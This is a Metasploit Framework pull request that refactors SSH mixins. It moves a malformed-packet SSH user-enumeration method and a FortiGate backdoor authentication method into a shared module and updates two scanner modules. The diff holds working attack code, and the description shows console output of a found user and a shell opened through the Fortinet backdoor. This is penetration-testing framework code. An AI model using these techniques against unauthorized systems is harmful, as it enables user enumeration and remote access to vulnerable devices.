### PR TITLE
Refactor SSH mixins and update modules

### DIFF
--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -121,8 +121,5 @@ require 'msf/core/exploit/http/jboss'
 # Kerberos Support
 require 'msf/core/exploit/kerberos/client'
 
-# Fortinet
-require 'msf/core/exploit/fortinet'
-
 # Other
 require 'msf/core/exploit/windows_constants'

--- a/lib/msf/core/exploit/ssh.rb
+++ b/lib/msf/core/exploit/ssh.rb
@@ -1,8 +1,18 @@
-module Msf
-  module Exploit::Remote::SSH
-    require 'rex/socket/ssh_factory'
-    def ssh_socket_factory
-      Rex::Socket::SSHFactory.new(framework, self, datastore['Proxies'])
-    end
+module Msf::Exploit::Remote::SSH
+
+  # Require most things so that modules using this will "just work"
+  require 'net/ssh'
+  require 'net/ssh/command_stream'
+  require 'rex/socket/ssh_factory'
+  require 'msf/core/exploit/ssh/auth_methods'
+
+  def ssh_socket_factory
+    Rex::Socket::SSHFactory.new(framework, self, datastore['Proxies'])
   end
+
+  # Finally patch in our custom auth methods:
+  #   malformed-packet
+  #   fortinet-backdoor
+  include Msf::Exploit::Remote::SSH::AuthMethods
+
 end

--- a/lib/msf/core/exploit/ssh/auth_methods.rb
+++ b/lib/msf/core/exploit/ssh/auth_methods.rb
@@ -1,13 +1,52 @@
-# -*- coding: binary -*-
+module Msf::Exploit::Remote::SSH::AuthMethods
 
-# https://www.ietf.org/rfc/rfc4252.txt
-# https://www.ietf.org/rfc/rfc4256.txt
+  #
+  # https://tools.ietf.org/rfc/rfc4252.txt
+  # https://tools.ietf.org/rfc/rfc4253.txt
+  #
+  class Net::SSH::Authentication::Methods::MalformedPacket < Net::SSH::Authentication::Methods::Abstract
+    def authenticate(service_name, username, password = nil)
+      debug { 'Sending SSH_MSG_USERAUTH_REQUEST (publickey)' }
 
-require 'net/ssh'
+      # Corrupt everything after auth method
+      send_message(userauth_request(
+=begin
+        string    user name in ISO-10646 UTF-8 encoding [RFC3629]
+        string    service name in US-ASCII
+        string    "publickey"
+        boolean   FALSE
+        string    public key algorithm name
+        string    public key blob
+=end
+        username,
+        service_name,
+        'publickey',
+        Rex::Text.rand_text_english(8..42)
+      ))
 
-module Msf::Exploit::Remote::Fortinet
+      # SSH_MSG_DISCONNECT is queued
+      begin
+        message = session.next_message
+      rescue Net::SSH::Disconnect
+        debug { 'Received SSH_MSG_DISCONNECT' }
+        return true
+      end
+
+      if message && message.type == USERAUTH_FAILURE
+        debug { 'Received SSH_MSG_USERAUTH_FAILURE' }
+        return false
+      end
+
+      # We'll probably never hit this
+      false
+    end
+  end
+
+  #
+  # https://www.ietf.org/rfc/rfc4252.txt
+  # https://www.ietf.org/rfc/rfc4256.txt
+  #
   class Net::SSH::Authentication::Methods::FortinetBackdoor < Net::SSH::Authentication::Methods::Abstract
-
     USERAUTH_INFO_REQUEST  = 60
     USERAUTH_INFO_RESPONSE = 61
 
@@ -119,6 +158,6 @@ module Msf::Exploit::Remote::Fortinet
       h = 'AK1' + Base64.encode64("\x00" * 12 + m.digest)
       [h]
     end
-
   end
+
 end

--- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
+++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
@@ -3,12 +3,8 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-# XXX: This shouldn't be necessary but is now
-require 'net/ssh/command_stream'
-
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::SSH
-  include Msf::Exploit::Remote::Fortinet
   include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::CommandShell
   include Msf::Auxiliary::Report

--- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb
@@ -3,13 +3,10 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'net/ssh'
-
 class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::SSH
   include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::Report
-  include Msf::Auxiliary::CommandShell
-  include Msf::Exploit::Remote::SSH
 
   def initialize(info = {})
     super(update_info(info,
@@ -121,7 +118,7 @@ class MetasploitModule < Msf::Auxiliary
     }
 
     # The auth method is converted into a class name for instantiation,
-    # so malformed-packet here becomes MalformedPacket defined below
+    # so malformed-packet here becomes MalformedPacket from the mixin
     case technique
     when :malformed_packet
       opts.merge!(:auth_methods => ['malformed-packet'])
@@ -256,51 +253,5 @@ class MetasploitModule < Msf::Auxiliary
 
     print_status("#{peer(ip)} Starting scan")
     users.each { |user| show_result(attempt_user(user, ip), user, ip) }
-  end
-end
-
-#
-# Define malformed-packet auth method for Net::SSH.start
-#
-# XXX: This is ghetto af (see lib/msf/core/exploit/fortinet.rb)
-#
-# https://tools.ietf.org/rfc/rfc4252.txt
-# https://tools.ietf.org/rfc/rfc4253.txt
-#
-class Net::SSH::Authentication::Methods::MalformedPacket < Net::SSH::Authentication::Methods::Abstract
-  def authenticate(service_name, username, password = nil)
-    debug { 'Sending SSH_MSG_USERAUTH_REQUEST (publickey)' }
-
-    # Corrupt everything after auth method
-    send_message(userauth_request(
-=begin
-      string    user name in ISO-10646 UTF-8 encoding [RFC3629]
-      string    service name in US-ASCII
-      string    "publickey"
-      boolean   FALSE
-      string    public key algorithm name
-      string    public key blob
-=end
-      username,
-      service_name,
-      'publickey',
-      Rex::Text.rand_text_english(8..42)
-    ))
-
-    # SSH_MSG_DISCONNECT is queued
-    begin
-      message = session.next_message
-    rescue Net::SSH::Disconnect
-      debug { 'Received SSH_MSG_DISCONNECT' }
-      return true
-    end
-
-    if message && message.type == USERAUTH_FAILURE
-      debug { 'Received SSH_MSG_USERAUTH_FAILURE' }
-      return false
-    end
-
-    # We'll probably never hit this
-    false
   end
 end


### PR DESCRIPTION
Sorry, I had one more. :sweat_smile:

- [x] Test `auxiliary/scanner/ssh/ssh_enumusers`
  - You can test the Fortinet virtual appliance below
- [x] Test `auxiliary/scanner/ssh/fortinet_backdoor`
  - https://github.com/nixawk/labs/tree/master/FortiGate-Backdoor-VM
- [x] Look for regressions in other modules

```
msf5 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] [redacted]:22 - SSH - Using malformed packet technique
[*] [redacted]:22 - SSH - Starting scan
[+] [redacted]:22 - SSH - User 'Fortimanager_Access' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_enumusers) > use auxiliary/scanner/ssh/fortinet_backdoor
msf5 auxiliary(scanner/ssh/fortinet_backdoor) > run

[+] [redacted]:22 - Logged in as Fortimanager_Access
[*] Command shell session 1 opened ([redacted]:56891 -> [redacted]:22) at 2018-09-06 00:10:01 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/fortinet_backdoor) >
```

#6612, #10374, #10479